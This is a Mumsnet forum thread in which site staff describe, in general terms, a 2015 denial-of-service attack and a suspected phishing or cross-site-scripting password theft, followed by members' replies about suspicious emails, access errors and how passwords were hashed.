More about the Technical side of the attacks on Mumsnet

[JustineMumsnet]

Hi all,
There are have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here - courtesy of the tech team is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began, proactively defending against them, minimising the impact of it and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyze, so it can be slow going at times. We are working with our technology partners who have a lot of experience of these kind of attacks and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial Of Service (DOS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on Open Web Application Security Project top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to either redirect the login process to their own site, to a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the later. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it so we don't want to rush and end up creating bigger holes but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

I agree about asking for all my personal details to be deleted - is this possible?

Oops - wrong thread.

I've had two emails from MN Contact Us since last night. Did have a "On the list" mail a few days ago to my old address. Changed my email address for MN.

Last night one mail 'Mumsnet Calling' last night addressed to another poster and her email address.

And another today other 'PLEASE READ...' to 'Mn (sic) Contact Us' '

The e-mails addressed to another user name are from mnhq - it was a BCC error by whoever was sending them out . Apology emails have been sent to the users whose email addresses were used as the first in each group of ten (with the other 9 BCCed). So (as long as my e-mail from mumsnet was genuine lol) this is not a hacker issue, just a 'gah' moment.

@WandaFuca

On one of my attempts to access the site, I got an error message I hadn't seen before:

"Error Code 20
The proxy failed to connect to the web server, due to TCP connection timeout."

Then my IP address, Proxy IP address, Origin Server IP.

Anyone know what that was all about?

We think this was to do with us getting the site back online, but if you see it again please shout!

someopne posted a screen shot of it on gransnet if you want a quick look at it.

I still can't access the app. It comes up with the BT page saying address not found.

BlackeyedSusan - That is pretty much the same that I got.

I tried earlier to use the app but got TalkTalk page coming up instead saying it couldn't open or find MN Is the app still down then?

I'm getting the sodding security certificate every single time I change page. Grrrrrrrr!

We think this was to do with us getting the site back online,

At a rough guess, at the point at which you changed your A records to point to Incapsula's anycast addresses, you were still under attack and hadn't quite got things locked down to the point that your origin servers were only visible from Incapsula. So people were going to Incapsula, but when they in turn referred them back to the real MN, it was still slow/down. Now your servers are only visible from Incapsula and all the A records are in synch, the error has gone away.

I have been forced out of GransNet. I joined earlier today with the same email I use here and it won't let me in there now.

I am on "The List" & have had neither of those emails from Mumsnet.

Mumsnet has thousands and thousands of registered members, shopafrolic, and of those, there will be some who have emails with all of the main providers. Some scammers will see an opportunity in this problem to send out thousands of 'topical' emails with phishing scams inside - and if they get, say, a 1 in a 1,000 hit rate, they're ahead. (The mails dont cost them anything after all.)

So - they may not be legit but that doesn't mean your account is in trouble.

shop I had the first email you've posted but not the second. W

shopafrolic from what I have read on the boards those emails are legit. I'm sure MNHq will confirm when they finally reach the bottom of the email pile.

Thanks all. Will keep things as they are for now then and wait to hear. Just anxious after bank account issues (which also could have been totally unrelated of course).

Shopafrolic - you should have x 2 mails
Apols for any additional anxiety caused.
Thanks

Thanks Olivia - I had the first you're on the list one immediately after the first hack. And then the two that I copied and pasted since. They just seemed odd as there was no MN branding and someone else's email address was showing.

I got one of those "apologies" emails today, but I'm not bothered, as the email is only used for MN, with no profile details, etc.

If anyone wants to email me, feel free, but I might not reply

Scrap the GN thing.

Can't believe a PP thinks Justine needs to be told "your husband probably does it this way", she's the CEO of a major website FFS, of course she knows what two stage authentication is. And I'm sure she uses online banking.
Plus, it's not exactly difficult to work out from the name is it?

But of course, best the liddle laydee defers to hubby so he can mansplain it to her....

Ah feck off. Once she sees the simplicity of their system she will know what I mean.

The OP, Justine, said:

"As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either."

Can someone expand on this - salted sha-256 passwords would probably be the standard on a site like this, is that what was in use?

Not being able to "unencrypt" doesn't mean a subset of the passwords can't be determined.

Also the problem is not really MN's data being accessed but the possibility that hashes are plain and so can be found from rainbow tables (or similar methods) and used against other sites.

The standard advice is always to change passwords on other sites where the same pass is used - this is true even if there are no known weaknesses in the hashing algo used as weaknesses in methodology (eg access to the site backend allowing phishing through the real domain) may exist.

I realise it's not the place in a main comment to highlight technical details but could someone comment further, particular were passwords salted?

[Aside, why on earth is there no thread search tool???]